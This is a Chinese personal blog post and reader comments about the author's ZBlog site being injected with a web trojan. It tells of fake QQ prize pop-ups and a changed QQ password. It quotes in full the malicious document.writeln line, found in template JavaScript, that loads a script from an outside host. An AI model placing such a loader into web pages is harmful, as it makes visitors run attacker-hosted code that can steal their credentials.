很不幸,博客居然被人挂马了。
具体是什么时间挂上的我还真不清楚了。记得前段时间自己在浏览网页的时候屏幕右下角居然弹出了QQ中奖的信息。老泰当然不会那么傻,直接在进程中关闭了。没想到的是马上QQ变提示密码被改。很吃惊,立刻登陆QQ安全中心修改了密码并且设置了限制地区登陆。当然,这里需要说明的是老泰当时浏览的绝对全部是正规的网站,包括像百度、Admin5和自己的博客之类。很奇怪木马从哪里传来?更为吃惊的是这个木马太强悍了,直接在进程中关闭也能修改掉我的QQ密码。想想也没太于留意。事情就算过去了,反正自己也没损失。
没想到的是事情过去了几天之后,今天凌晨在预备写博客的同时居然又出现了这样的中奖信息。和上次同样的操作进程中关闭了。同时想着等写完博客再去修改密码吧。没想到的是博客突然出现打不开的情况,而自己在同一服务器的其他站点却没有任何事情。马上联想到了前几天在卢松松的博客中看到的文章如何检测和预防网页挂马?。心想不会这么背吧,让朋友一看,果然被挂马了。
朋友们也应该知道,老泰在相关的技术上可以说是一个文盲。压根不懂得去解决这一问题。于是搜索呀再搜索,查找呀再查找。终于在几个模板的js中发现了木马
document.writeln("<script src=\"http:\/\/www.15sai.cn\/index.js\" language=\"JavaScript\" charset=\"gb2312\"><\/script>");
并且隐藏之深,数量之多另老泰很是头疼。迅速删除解决。终于博客恢复了正常。
解决了“标”该想想如何解决“本”的问题了。朋友告诉我说这不像个普通的黑客,像是专门针对我而来的。老泰想想扪心自问在网络上也没做过什么没良心的事,更谈不上得罪什么什么人了。现在老泰只能找到根本原因有两种情况:要么是ZBlog程序的漏洞,要么是服务器的其他站点被人入侵了。感觉后者的可能性比较大。再观察一段时间如果再次发生那么老泰真得考虑换服务器的事情了。
另外在此老泰也寻求高手的协助,毕竟老泰在技术方面和文盲并没有什么区别。
2009/10/18 于 00:06:09
交一些这方面的朋友比较好!
2009/10/09 于 16:39:53
建议换一个安全一点的主机去用,现在的垃圾主机太多了,一点防御性都没有!
2009/07/31 于 12:26:47
呵..那然后得小心点了.还有你找到注入点了没?
2009/07/21 于 11:03:36
选择好的服务器显得很重要
2009/07/19 于 19:31:44
这是对我们下的手啊